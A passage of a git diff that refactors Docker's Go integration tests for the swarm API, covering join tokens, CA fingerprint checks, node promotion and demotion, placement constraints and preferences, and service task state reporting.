+ // create service + instances := 3 + constraints := []string{"node.labels.security==high"} + id := daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].GetServiceTasks(c, id) + // validate all tasks are running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[0].ID) + } + //remove service + daemons[0].RemoveService(c, id) + + // create service + constraints = []string{"node.labels.security!=high"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks ready + 
waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + // validate all tasks are NOT running on nodes[0] + for _, task := range tasks { + c.Assert(task.NodeID, checker.Not(checker.Equals), nodes[0].ID) + } + //remove service + daemons[0].RemoveService(c, id) + + constraints = []string{"node.labels.security==medium"} + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + //remove service + daemons[0].RemoveService(c, id) + + // multiple constraints + constraints = []string{ + "node.labels.security==high", + fmt.Sprintf("node.id==%s", nodes[1].ID), + } + id = daemons[0].CreateService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) + // wait for tasks created + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceTasks(id), checker.Equals, instances) + // let scheduler try + time.Sleep(250 * time.Millisecond) + tasks = daemons[0].GetServiceTasks(c, id) + // validate tasks are not assigned + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, "") + } + // make nodes[1] fulfills the constraints + daemons[0].UpdateNode(c, nodes[1].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "security": "high", + } + }) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks = daemons[0].GetServiceTasks(c, id) + for _, task := range tasks { + c.Assert(task.NodeID, checker.Equals, nodes[1].ID) 
+ } +} + +func (s *DockerSwarmSuite) TestAPISwarmServicePlacementPrefs(c *check.C) { + const nodeCount = 3 + var daemons [nodeCount]*daemon.Daemon + for i := 0; i < nodeCount; i++ { + daemons[i] = s.AddDaemon(c, true, i == 0) + } + // wait for nodes ready + waitAndAssert(c, 5*time.Second, daemons[0].CheckNodeReadyCount, checker.Equals, nodeCount) + nodes := daemons[0].ListNodes(c) + c.Assert(len(nodes), checker.Equals, nodeCount) + + // add labels to nodes + daemons[0].UpdateNode(c, nodes[0].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "rack": "a", + } + }) + for i := 1; i < nodeCount; i++ { + daemons[0].UpdateNode(c, nodes[i].ID, func(n *swarm.Node) { + n.Spec.Annotations.Labels = map[string]string{ + "rack": "b", + } + }) + } + + // create service + instances := 4 + prefs := []swarm.PlacementPreference{{Spread: &swarm.SpreadOver{SpreadDescriptor: "node.labels.rack"}}} + id := daemons[0].CreateService(c, simpleTestService, setPlacementPrefs(prefs), setInstances(instances)) + // wait for tasks ready + waitAndAssert(c, defaultReconciliationTimeout, daemons[0].CheckServiceRunningTasks(id), checker.Equals, instances) + tasks := daemons[0].GetServiceTasks(c, id) + // validate all tasks are running on nodes[0] + tasksOnNode := make(map[string]int) + for _, task := range tasks { + tasksOnNode[task.NodeID]++ + } + c.Assert(tasksOnNode[nodes[0].ID], checker.Equals, 2) + c.Assert(tasksOnNode[nodes[1].ID], checker.Equals, 1) + c.Assert(tasksOnNode[nodes[2].ID], checker.Equals, 1) +} + +func (s *DockerSwarmSuite) TestAPISwarmServicesStateReporting(c *check.C) { + testRequires(c, SameHostDaemon) + testRequires(c, DaemonIsLinux) + + d1 := s.AddDaemon(c, true, true) + d2 := s.AddDaemon(c, true, true) + d3 := s.AddDaemon(c, true, false) + + time.Sleep(1 * time.Second) // make sure all daemons are ready to accept + + instances := 9 + d1.CreateService(c, simpleTestService, setInstances(instances)) + + waitAndAssert(c, defaultReconciliationTimeout, 
reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + getContainers := func() map[string]*daemon.Daemon { + m := make(map[string]*daemon.Daemon) + for _, d := range []*daemon.Daemon{d1, d2, d3} { + for _, id := range d.ActiveContainers(c) { + m[id] = d + } + } + return m + } + + containers := getContainers() + c.Assert(containers, checker.HasLen, instances) + var toRemove string + for i := range containers { + toRemove = i + } + + _, err := containers[toRemove].Cmd("stop", toRemove) + c.Assert(err, checker.IsNil) + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + containers2 := getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } + + containers = containers2 + for i := range containers { + toRemove = i + } + + // try with killing process outside of docker + pidStr, err := containers[toRemove].Cmd("inspect", "-f", "{{.State.Pid}}", toRemove) + c.Assert(err, checker.IsNil) + pid, err := strconv.Atoi(strings.TrimSpace(pidStr)) + c.Assert(err, checker.IsNil) + c.Assert(unix.Kill(pid, unix.SIGKILL), checker.IsNil) + + time.Sleep(time.Second) // give some time to handle the signal + + waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.CheckActiveContainerCount, d2.CheckActiveContainerCount, d3.CheckActiveContainerCount), checker.Equals, instances) + + containers2 = getContainers() + c.Assert(containers2, checker.HasLen, instances) + for i := range containers { + if i == toRemove { + c.Assert(containers2[i], checker.IsNil) + } else { + c.Assert(containers2[i], checker.NotNil) + } + } +} diff --git 
a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go index 1f8eaec6de..6a31dd209f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_api_swarm_test.go @@ -3,21 +3,31 @@ package main import ( - "encoding/json" + "context" "fmt" + "io/ioutil" + "net" "net/http" - "os" "path/filepath" - "strconv" "strings" "sync" - "syscall" "time" + "github.com/cloudflare/cfssl/csr" + "github.com/cloudflare/cfssl/helpers" + "github.com/cloudflare/cfssl/initca" "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/daemon" + testdaemon "github.com/docker/docker/internal/test/daemon" + "github.com/docker/docker/internal/test/request" + "github.com/docker/swarmkit/ca" "github.com/go-check/check" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) var defaultReconciliationTimeout = 30 * time.Second @@ -25,571 +35,237 @@ var defaultReconciliationTimeout = 30 * time.Second func (s *DockerSwarmSuite) TestAPISwarmInit(c *check.C) { // todo: should find a better way to verify that components are running than /info d1 := s.AddDaemon(c, true, true) - info, err := d1.info() - c.Assert(err, checker.IsNil) + info := d1.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + c.Assert(info.Cluster.RootRotationInProgress, checker.False) d2 := s.AddDaemon(c, true, false) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) // 
Leaving cluster - c.Assert(d2.Leave(false), checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: d1.joinTokens(c).Worker, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{ + ListenAddr: d1.SwarmListenAddr(), + JoinToken: d1.JoinTokens(c).Worker, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) // Current state restoring after restarts - err = d1.Stop() - c.Assert(err, checker.IsNil) - err = d2.Stop() - c.Assert(err, checker.IsNil) + d1.Stop(c) + d2.Stop(c) - err = d1.Start() - c.Assert(err, checker.IsNil) - err = d2.Start() - c.Assert(err, checker.IsNil) + d1.Start(c) + d2.Start(c) - info, err = d1.info() - c.Assert(err, checker.IsNil) + info = d1.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.True) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) } func (s *DockerSwarmSuite) TestAPISwarmJoinToken(c *check.C) { d1 := s.AddDaemon(c, false, false) - c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d1.SwarmInit(c, swarm.InitRequest{}) + + // todo: error message differs depending if some components of token are valid d2 := s.AddDaemon(c, false, false) - err := d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + c2 := d2.NewClientT(c) + err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: 
d2.SwarmListenAddr(), + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - err = d2.Join(swarm.JoinRequest{JoinToken: "foobaz", RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: "foobaz", + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) - c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(err.Error(), checker.Contains, "invalid join token") + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - workerToken := d1.joinTokens(c).Worker + workerToken := d1.JoinTokens(c).Worker - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: workerToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) // change tokens - d1.rotateTokens(c) + d1.RotateTokens(c) - err = d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: workerToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) 
c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - workerToken = d1.joinTokens(c).Worker + workerToken = d1.JoinTokens(c).Worker - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}}) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) // change spec, don't change tokens - d1.updateSwarm(c, func(s *swarm.Spec) {}) + d1.UpdateSwarm(c, func(s *swarm.Spec) {}) - err = d2.Join(swarm.JoinRequest{RemoteAddrs: []string{d1.listenAddr}}) + err = c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "join token is necessary") - info, err = d2.info() - c.Assert(err, checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) - c.Assert(d2.Join(swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.listenAddr}}), checker.IsNil) - info, err = d2.info() - c.Assert(err, checker.IsNil) + d2.SwarmJoin(c, swarm.JoinRequest{JoinToken: workerToken, RemoteAddrs: []string{d1.SwarmListenAddr()}}) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - c.Assert(d2.Leave(false), checker.IsNil) - info, err = d2.info() 
- c.Assert(err, checker.IsNil) + c.Assert(d2.SwarmLeave(false), checker.IsNil) + info = d2.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateInactive) } +func (s *DockerSwarmSuite) TestUpdateSwarmAddExternalCA(c *check.C) { + d1 := s.AddDaemon(c, false, false) + d1.SwarmInit(c, swarm.InitRequest{}) + d1.UpdateSwarm(c, func(s *swarm.Spec) { + s.CAConfig.ExternalCAs = []*swarm.ExternalCA{ + { + Protocol: swarm.ExternalCAProtocolCFSSL, + URL: "https://thishasnoca.org", + }, + { + Protocol: swarm.ExternalCAProtocolCFSSL, + URL: "https://thishasacacert.org", + CACert: "cacert", + }, + } + }) + info := d1.SwarmInfo(c) + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs, checker.HasLen, 2) + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[0].CACert, checker.Equals, "") + c.Assert(info.Cluster.Spec.CAConfig.ExternalCAs[1].CACert, checker.Equals, "cacert") +} + func (s *DockerSwarmSuite) TestAPISwarmCAHash(c *check.C) { d1 := s.AddDaemon(c, true, true) d2 := s.AddDaemon(c, false, false) - splitToken := strings.Split(d1.joinTokens(c).Worker, "-") + splitToken := strings.Split(d1.JoinTokens(c).Worker, "-") splitToken[2] = "1kxftv4ofnc6mt30lmgipg6ngf9luhwqopfk1tz6bdmnkubg0e" replacementToken := strings.Join(splitToken, "-") - err := d2.Join(swarm.JoinRequest{JoinToken: replacementToken, RemoteAddrs: []string{d1.listenAddr}}) + c2 := d2.NewClientT(c) + err := c2.SwarmJoin(context.Background(), swarm.JoinRequest{ + ListenAddr: d2.SwarmListenAddr(), + JoinToken: replacementToken, + RemoteAddrs: []string{d1.SwarmListenAddr()}, + }) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "remote CA does not match fingerprint") } func (s *DockerSwarmSuite) TestAPISwarmPromoteDemote(c *check.C) { d1 := s.AddDaemon(c, false, false) - c.Assert(d1.Init(swarm.InitRequest{}), checker.IsNil) + d1.SwarmInit(c, swarm.InitRequest{}) d2 := s.AddDaemon(c, true, false) - info, err := d2.info() - c.Assert(err, checker.IsNil) + info := d2.SwarmInfo(c) 
c.Assert(info.ControlAvailable, checker.False) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleManager }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.True) - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleWorker }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.False) + waitAndAssert(c, defaultReconciliationTimeout, d2.CheckControlAvailable, checker.False) + + // Wait for the role to change to worker in the cert. This is partially + // done because it's something worth testing in its own right, and + // partially because changing the role from manager to worker and then + // back to manager quickly might cause the node to pause for awhile + // while waiting for the role to change to worker, and the test can + // time out during this interval. 
+ waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + certBytes, err := ioutil.ReadFile(filepath.Join(d2.Folder, "root", "swarm", "certificates", "swarm-node.crt")) + if err != nil { + return "", check.Commentf("error: %v", err) + } + certs, err := helpers.ParseCertificatesPEM(certBytes) + if err == nil && len(certs) > 0 && len(certs[0].Subject.OrganizationalUnit) > 0 { + return certs[0].Subject.OrganizationalUnit[0], nil + } + return "", check.Commentf("could not get organizational unit from certificate") + }, checker.Equals, "swarm-worker") // Demoting last node should fail - node := d1.getNode(c, d1.NodeID) + node := d1.GetNode(c, d1.NodeID()) node.Spec.Role = swarm.NodeRoleWorker url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) - status, out, err := d1.SockRequest("POST", url, node.Spec) + res, body, err := request.Post(url, request.Host(d1.Sock()), request.JSONBody(node.Spec)) c.Assert(err, checker.IsNil) - c.Assert(status, checker.Equals, http.StatusInternalServerError, check.Commentf("output: %q", string(out))) - c.Assert(string(out), checker.Contains, "last manager of the swarm") - info, err = d1.info() + b, err := request.ReadBody(body) c.Assert(err, checker.IsNil) + c.Assert(res.StatusCode, checker.Equals, http.StatusBadRequest, check.Commentf("output: %q", string(b))) + + // The warning specific to demoting the last manager is best-effort and + // won't appear until the Role field of the demoted manager has been + // updated. + // Yes, I know this looks silly, but checker.Matches is broken, since + // it anchors the regexp contrary to the documentation, and this makes + // it impossible to match something that includes a line break. 
+ if !strings.Contains(string(b), "last manager of the swarm") { + c.Assert(string(b), checker.Contains, "this would result in a loss of quorum") + } + info = d1.SwarmInfo(c) c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) c.Assert(info.ControlAvailable, checker.True) // Promote already demoted node - d1.updateNode(c, d2.NodeID, func(n *swarm.Node) { + d1.UpdateNode(c, d2.NodeID(), func(n *swarm.Node) { n.Spec.Role = swarm.NodeRoleManager }) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkControlAvailable, checker.True) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesEmptyList(c *check.C) { - d := s.AddDaemon(c, true, true) - - services := d.listServices(c) - c.Assert(services, checker.NotNil) - c.Assert(len(services), checker.Equals, 0, check.Commentf("services: %#v", services)) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesCreate(c *check.C) { - d := s.AddDaemon(c, true, true) - - instances := 2 - id := d.createService(c, simpleTestService, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - - service := d.getService(c, id) - instances = 5 - d.updateService(c, service, setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, instances) - - d.removeService(c, service.ID) - waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 0) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesMultipleAgents(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) - - time.Sleep(1 * time.Second) // make sure all daemons are ready to accept tasks - - instances := 9 - id := d1.createService(c, simpleTestService, setInstances(instances)) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, 
d2.checkActiveContainerCount, checker.GreaterThan, 0) - waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.GreaterThan, 0) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d2.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - // reconciliation on d2 node down - c.Assert(d2.Stop(), checker.IsNil) - - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - - // test downscaling - instances = 5 - d1.updateService(c, d1.getService(c, id), setInstances(instances)) - waitAndAssert(c, defaultReconciliationTimeout, reducedCheck(sumAsIntegers, d1.checkActiveContainerCount, d3.checkActiveContainerCount), checker.Equals, instances) - -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesCreateGlobal(c *check.C) { - d1 := s.AddDaemon(c, true, true) - d2 := s.AddDaemon(c, true, false) - d3 := s.AddDaemon(c, true, false) - - d1.createService(c, simpleTestService, setGlobalMode) - - waitAndAssert(c, defaultReconciliationTimeout, d1.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d2.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d3.checkActiveContainerCount, checker.Equals, 1) - - d4 := s.AddDaemon(c, true, false) - d5 := s.AddDaemon(c, true, false) - - waitAndAssert(c, defaultReconciliationTimeout, d4.checkActiveContainerCount, checker.Equals, 1) - waitAndAssert(c, defaultReconciliationTimeout, d5.checkActiveContainerCount, checker.Equals, 1) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesUpdate(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, 
checker.Equals, nodeCount) - - // service image at start - image1 := "busybox:latest" - // target image in update - image2 := "busybox:test" - - // create a different tag - for _, d := range daemons { - out, err := d.Cmd("tag", image1, image2) - c.Assert(err, checker.IsNil, check.Commentf(out)) - } - - // create service - instances := 5 - parallelism := 2 - id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) - - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) - - // issue service update - service := daemons[0].getService(c, id) - daemons[0].updateService(c, service, setImage(image2)) - - // first batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances - parallelism, image2: parallelism}) - - // 2nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances - 2*parallelism, image2: 2 * parallelism}) - - // 3nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances}) - - // Roll back to the previous version. This uses the CLI because - // rollback is a client-side operation. 
- out, err := daemons[0].Cmd("service", "update", "--rollback", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - // first batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances - parallelism, image1: parallelism}) - - // 2nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image2: instances - 2*parallelism, image1: 2 * parallelism}) - - // 3nd batch - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) -} - -func (s *DockerSwarmSuite) TestAPISwarmServicesFailedUpdate(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - - // service image at start - image1 := "busybox:latest" - // target image in update - image2 := "busybox:badtag" - - // create service - instances := 5 - id := daemons[0].createService(c, serviceForUpdate, setInstances(instances)) - - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) - - // issue service update - service := daemons[0].getService(c, id) - daemons[0].updateService(c, service, setImage(image2), setFailureAction(swarm.UpdateFailureActionPause), setMaxFailureRatio(0.25), setParallelism(1)) - - // should update 2 tasks and then pause - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceUpdateState(id), checker.Equals, swarm.UpdateStatePaused) - v, _ := daemons[0].checkServiceRunningTasks(id)(c) - c.Assert(v, checker.Equals, instances-2) - - // Roll back to the previous version. 
This uses the CLI because - // rollback is a client-side operation. - out, err := daemons[0].Cmd("service", "update", "--rollback", id) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkRunningTaskImages, checker.DeepEquals, - map[string]int{image1: instances}) -} - -func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintRole(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - - // create service - constraints := []string{"node.role==worker"} - instances := 3 - id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - // validate tasks are running on worker nodes - tasks := daemons[0].getServiceTasks(c, id) - for _, task := range tasks { - node := daemons[0].getNode(c, task.NodeID) - c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleWorker) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.role!=worker"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks = daemons[0].getServiceTasks(c, id) - // validate tasks are running on manager nodes - for _, task := range tasks { - node := daemons[0].getNode(c, task.NodeID) - c.Assert(node.Spec.Role, checker.Equals, swarm.NodeRoleManager) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.role==nosuchrole"} - id = 
daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks created - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceTasks(id), checker.Equals, instances) - // let scheduler try - time.Sleep(250 * time.Millisecond) - // validate tasks are not assigned to any node - tasks = daemons[0].getServiceTasks(c, id) - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, "") - } -} - -func (s *DockerSwarmSuite) TestAPISwarmServiceConstraintLabel(c *check.C) { - const nodeCount = 3 - var daemons [nodeCount]*SwarmDaemon - for i := 0; i < nodeCount; i++ { - daemons[i] = s.AddDaemon(c, true, i == 0) - } - // wait for nodes ready - waitAndAssert(c, 5*time.Second, daemons[0].checkNodeReadyCount, checker.Equals, nodeCount) - nodes := daemons[0].listNodes(c) - c.Assert(len(nodes), checker.Equals, nodeCount) - - // add labels to nodes - daemons[0].updateNode(c, nodes[0].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "high", - } - }) - for i := 1; i < nodeCount; i++ { - daemons[0].updateNode(c, nodes[i].ID, func(n *swarm.Node) { - n.Spec.Annotations.Labels = map[string]string{ - "security": "low", - } - }) - } - - // create service - instances := 3 - constraints := []string{"node.labels.security==high"} - id := daemons[0].createService(c, simpleTestService, setConstraints(constraints), setInstances(instances)) - // wait for tasks ready - waitAndAssert(c, defaultReconciliationTimeout, daemons[0].checkServiceRunningTasks(id), checker.Equals, instances) - tasks := daemons[0].getServiceTasks(c, id) - // validate all tasks are running on nodes[0] - for _, task := range tasks { - c.Assert(task.NodeID, checker.Equals, nodes[0].ID) - } - //remove service - daemons[0].removeService(c, id) - - // create service - constraints = []string{"node.labels.security!=high"} - id = daemons[0].createService(c, simpleTestService, setConstraints(constraints), 
